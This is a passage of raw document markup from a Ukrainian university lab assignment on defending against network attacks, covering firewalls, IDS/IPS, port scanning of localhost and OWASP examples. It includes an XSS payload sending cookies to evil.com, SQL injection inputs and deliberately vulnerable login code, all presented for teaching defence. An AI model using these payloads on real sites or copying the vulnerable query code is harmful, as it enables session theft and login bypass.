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№9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Програмні засоби захисту від атак з мережі Internet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основні типи мережевих атак та програмні засоби захисту від них. Навчитися аналізувати мережевий трафік, налаштовувати брандмауер та виявляти вразливості.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Wireshark або tcpdump; Доступ до командного рядка з правами адміністратора; Компілятор або інтерпретатор мови програмування за вибором студента; Віртуальна машина (опціонально, для безпечних експериментів).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4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типи-мережевих-атак"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 Типи мережевих атак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КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК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ЗА МЕТОЮ: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├── Отримання доступу (Access attacks)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  ├── Підбір паролів (Brute force)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  ├── Експлуатація вразливостей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  └── Man-in-the-Middle (MITM)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├── Відмова в обслуговуванні (DoS/DDoS)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  ├── SYN Flood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  ├── UDP Flood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  └── Amplification attacks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└── Розвідка (Reconnaissance)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├── Сканування портів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├── Сканування вразливостей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└── DNS enumeration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ЗА РІВНЕМ OSI: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├── L2: ARP spoofing, MAC flooding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├── L3: IP spoofing, ICMP attacks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├── L4: TCP/UDP attacks, port scanning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└── L7: SQL injection, XSS, CSRF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9"/>
    <w:bookmarkStart w:id="10" w:name="брандмауер-firewall"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 Брандмауер (Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Брандмауер — це програмний або апаратний засіб, який фільтрує мережевий трафік за заданими правилами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Типи брандмауерів:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 1 — Типи брандмауерів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Рівень</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Особливості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Пакетний фільтр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L3-L4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Фільтрація за IP, портами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Stateful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L3-L4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Відстеження з’єднань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L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Аналіз протоколів HTTP, FTP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Next-Gen (NGFW)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L3-L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DPI, IPS, антивірус</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Базові правила: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ЛОГІКА ПРАВИЛ БРАНДМАУЕРА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Правила перевіряються ПОСЛІДОВНО (зверху вниз)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Перше правило, що підходить, визначає долю пакета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Приклад набору правил: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┌─────────────────────────────────────────────────────────────────┐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1. ALLOW TCP dst-port=443 (HTTPS)                               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2. ALLOW TCP dst-port=80  (HTTP)                                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3. ALLOW UDP dst-port=53  (DNS)                                 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4. ALLOW ICMP type=8      (ping request)                        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5. DENY ALL               (все інше заборонено)                 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└─────────────────────────────────────────────────────────────────┘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Принцип: "Deny by default" — заборонено все, крім явно дозволеного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0"/>
    <w:bookmarkStart w:id="11" w:name="ids-та-ips"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 IDS та IPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDS (Intrusion Detection System)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— система виявлення вторгнень. Аналізує трафік і сповіщає про підозрілу активність.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IPS (Intrusion Prevention System)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— система запобігання вторгненням. Не тільки виявляє, а й блокує атаки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 2 — Порівняння IDS та IPS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IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">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Розташування</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Поруч з трафіком (span port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">На шляху трафіку (inline)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Сповіщення</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Блокування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Затримка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Мінімальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Додає латентність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Помилкові спрацювання</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Менш критичні</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Можуть блокувати легітимний трафік</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Методи виявлення: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Сигнатурний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: пошук відомих патернів атак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Аномальний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: виявлення відхилень від нормальної поведінки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Евристичний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: аналіз підозрілої поведінки</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="веб-вразливості-owasp-top-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4 Веб-вразливості (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-ін’єкція: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-- Вразливий код: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SELECT * FROM users WHERE login='$input' AND pass='$pass'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-- Атака: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login: admin'--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pass: anything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-- Результат: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SELECT * FROM users WHERE login='admin'--' AND pass='anything'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-- Коментар '--' ігнорує перевірку пароля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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Cross-Site Scripting):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&lt;!-- Вразливий код: --&gt;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&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;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&lt;!-- Атака: --&gt;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?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;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&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Захист: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SQL: параметризовані запити (prepared statements)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XSS: екранування виводу, Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="інструменти"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 Інструменти</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 3 — Інструменти аналізу мережевої безпеки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Інструмент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t xml:space="preserve">Команда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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Аналіз трафіку</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GUI-інтерфейс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tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Захоплення пакетів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tcpdump -i eth0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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Сканування портів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nmap -sV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Перегляд з’єднань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 -an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iptables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Брандмауер 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iptables -L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="27" w:name="приклад-виконання"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Приклад виконання</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="завдання-1-аналіз-мережевого-трафіку"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 1: Аналіз мережевого трафіку</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="15" w:name="windows-powershell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows (PowerShell)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Перегляд активних TCP-з'єднань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Get-NetTCPConnection | Where-Object State -eq 'Established'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Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess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Sort-Object RemoteAddress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Перегляд активних UDP-з'єднань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Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess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Визначення процесу за PID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Get-Process -Id 1234 | Select-Object Name, Path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5"/>
    <w:bookmarkStart w:id="16" w:name="linux-bash"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux (bash)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Активні з'єднання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ss -tunapl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Або через netstat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netstat -tunapl | grep ESTABLISHED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Захоплення HTTP-трафіку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tcpdump -i eth0 port 80 -A | head -50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6"/>
    <w:bookmarkStart w:id="17" w:name="wireshark"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark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Запустіть Wireshark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Виберіть мережевий інтерфейс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Застосуйте фільтр:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http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tcp.port == 443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Проаналізуйте захоплені пакети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Корисні фільтри Wireshark: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5580"/>
        <w:gridCol w:w="40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Фільтр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Опис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ip.addr == 192.168.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Трафік з/на IP-адресу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tcp.port == 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP-трафік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http.request.method == "POST"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST-запити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dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DNS-запити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tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack == 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SYN-пакети (початок з’єднання)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="21" w:name="завдання-2-налаштування-брандмауера"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 2: Налаштування брандмауера</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="19" w:name="X0662c116dd2737dcfed58aa4a6d4125c8494f4f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows Firewall (PowerShell з правами адміністратора)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Перегляд поточних правил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Get-NetFirewallRule | Where-Object Enabled -eq True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Select-Object DisplayName, Direction, Action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Створення правила: блокувати вхідні на порт 23 (Telnet)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New-NetFirewallRule -DisplayName "Block Telnet" `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-Direction Inbound `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-LocalPort 23 `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-Protocol TCP `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-Action Block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Створення правила: дозволити вхідні на порт 443 (HTTPS)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New-NetFirewallRule -DisplayName "Allow HTTPS" `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-Direction Inbound `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-LocalPort 443 `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-Protocol TCP `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-Action Allow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Видалення правила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Remove-NetFirewallRule -DisplayName "Block Telnet"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Перевірка статусу брандмауера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Get-NetFirewallProfile | Select-Object Name, Enabled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9"/>
    <w:bookmarkStart w:id="20" w:name="linux-iptables"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux iptables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Перегляд поточних правил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iptables -L -n -v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Дозволити вхідні на порт 80 (HTTP)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iptables -A INPUT -p tcp --dport 80 -j ACCEPT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Дозволити вхідні на порт 443 (HTTPS)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iptables -A INPUT -p tcp --dport 443 -j ACCEPT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Заблокувати вхідні з конкретної IP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iptables -A INPUT -s 10.0.0.100 -j DROP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Заборонити все інше (в кінці)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iptables -A INPUT -j DROP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Зберегти правила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iptables-save &gt; /etc/iptables.rules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0"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="24" w:name="завдання-3-сканування-портів"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 3: Сканування портів</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Увага</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: сканування портів без дозволу власника системи є незаконним. Використовуйте тільки на власних системах або з явного дозволу.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="перевірка-відкритих-портів-локально"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перевірка відкритих портів локально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Windows: перевірка прослуховуваних портів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Get-NetTCPConnection -State Listen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Select-Object LocalPort, OwningProcess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Sort-Object LocalPort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Визначення процесів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Get-NetTCPConnection -State Listen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ForEach-Object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$proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue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[PSCustomObject]@{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Port = $_.LocalPort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Process = $proc.Name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Path = $proc.Path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 | Sort-Object Port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Linux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ss -tuln | grep LISTEN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2"/>
    <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Базове сканування портів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// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,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у властивостях додати бібліотеку ws2_32.lib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(Linker → Input → Additional Dependencies).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&lt;vector&gt;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#ifdef _WIN32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#include &lt;winsock2.h&gt;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#include &lt;ws2tcpip.h&gt;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#pragma comment(lib, "ws2_32.lib")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using socket_t = SOCKET;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const socket_t INVALID_SOCK = INVALID_SOCKET;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#else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#include &lt;sys/socket.h&gt;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#include &lt;arpa/inet.h&gt;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#include &lt;unistd.h&gt;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using socket_t = int;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const socket_t INVALID_SOCK = -1;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#define closesocket close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#endif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struct ServiceName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port;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const char* name;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const ServiceName KNOWN_SERVICES[]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{21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},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{53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},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{443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},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{5432, "PostgreSQL"}, {8080, "HTTP-alt"}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const char* serviceName(int port)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(const ServiceName&amp; service : KNOWN_SERVICES)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(service.port == port) return service.name;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"Unknown";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Спроба встановити з'єднання: успіх означає, що порт відкритий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bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500)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socket_t sock = socket(AF_INET, SOCK_STREAM, 0);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(sock == INVALID_SOCK) return false;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Обмежуємо час очікування, інакше сканування триватиме надто довго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#ifdef _WIN32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DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);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setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,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reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));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#else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timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };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setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));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#endif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sockaddr_in address{};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address.sin_family = AF_INET;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address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));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inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);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bool opened 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connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) ==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closesocket(sock);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opened;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УВАГА: сканувати дозволено лише власний комп'ютер або вузол,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на який є письмовий дозвіл власника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const std::string target = "127.0.0.1";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const std::vector&lt;int&gt; ports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21, 22, 23, 25, 53, 80, 110, 135, 139, 143,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443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080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#ifdef _WIN32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WSADATA wsa;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(WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 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std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";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#endif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"Сканування " &lt;&lt; target &lt;&lt; "...\n\n";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"Відкриті порти:\n";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int found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port : ports)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(isPortOpen(target, port))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std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port)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++found;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if (found == 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"  (жодного з перевірених портів не відкрито)\n";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#ifdef _WIN32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WSACleanup();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#endif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3"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="26" w:name="завдання-4-захист-веб-застосунку"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 4: Захист веб-застосунку</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="демонстрація-sql-інєкції-та-захисту"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Демонстрація SQL-ін’єкції та захисту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// Демонстрація SQL-ін'єкції та захисту від неї.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Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h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до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.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"sqlite3.h"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Створює навчальну базу в пам'яті з двома обліковими записами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sqlite3* setupDatabase()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sqlite3* db = nullptr;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sqlite3_open(":memory:", &amp;db);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const char* schema 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"CREATE TABLE users ("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"  id INTEGER PRIMARY KEY,"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"  login TEXT NOT NULL,"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"  password TEXT NOT NULL,"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"  role TEXT DEFAULT 'user');"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"INSERT INTO users (login, password, role)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"VALUES ('admin', 'secret123', 'admin');"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"INSERT INTO users (login, password, role)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"VALUES ('user1', 'pass1', 'user');";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sqlite3_exec(db, schema, nullptr, nullptr, nullptr);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db;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ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача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потрапляють у текст запиту й змінюють його структуру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bool vulnerableLogin(sqlite3* db, const std::string&amp; login,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const std::string&amp; password)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query = "SELECT login, role FROM users WHERE login='" + login +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"' AND password='" + password + "'";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"[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query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sqlite3_stmt* stmt = nullptr;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(sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK)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"[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db)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false;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bool found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[ВРАЗЛИВИЙ] Вхід виконано як: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&lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль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&lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";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sqlite3_finalize(stmt);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found;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БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються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окремо через параметри й ніколи не тлумачаться як код SQL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bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password)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const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";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"[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query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"[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";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sqlite3_stmt* stmt = nullptr;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sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);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sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);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sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);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bool found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[БЕЗПЕЧНИЙ] Вхід виконано як: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&lt;&lt; sqlite3_column_text(stmt, 0)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sqlite3_finalize(stmt);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found;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sqlite3* db = setupDatabase();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"=== Коректний вхід ===\n";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vulnerableLogin(db, "admin", "secret123");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"\n=== Атака SQL-ін'єкцією ===\n";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Введене значення закриває лапку й додає умову, істинну завжди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injection = "' OR '1'='1";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bool bypassed = vulnerableLogin(db, "admin", injection);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"Результат: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(bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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"\n=== Та сама атака на параметризованому запиті ===\n";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bool blocked = safeLogin(db, "admin", injection);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"Результат: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(blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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sqlite3_close(db);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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Очікуваний результат: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============================================================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ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ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============================================================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--- Звичайний вхід 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[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'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Результат: (1, 'admin', 'secret123', 'admin')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--- SQL-ін'єкція: admin'-- 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[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'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Результат: (1, 'admin', 'secret123', 'admin')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АТАКА УСПІШНА! Увійшли без пароля.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--- Той самий ввід через безпечний метод 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[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?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[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')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Результат: None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Ін'єкція заблокована!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============================================================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ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ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============================================================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Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;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Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;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НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.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З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;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Безпечно! Скрипт відображається як текст.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5"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28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4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4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Аналіз мережевого трафіку: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- Встановити Wireshark (якщо не встановлено)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 Запустити захоплення трафіку на основному інтерфейсі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 Відвідати кілька веб-сайтів (HTTP і HTTPS)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 Знайти та проаналізувати HTTP-запити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 Застосувати фільтри для виділення трафіку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Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Налаштування брандмауера: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- Переглянути поточні правила брандмауера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 Створити правило для блокування порту з варіанта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 Створити правило для дозволу порту з варіанта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 Перевірити роботу правил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 Видалити тестові правила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Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Сканування портів: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- Визначити відкриті порти на localhost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 Ідентифікувати процеси, що прослуховують порти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 Записати результати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Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
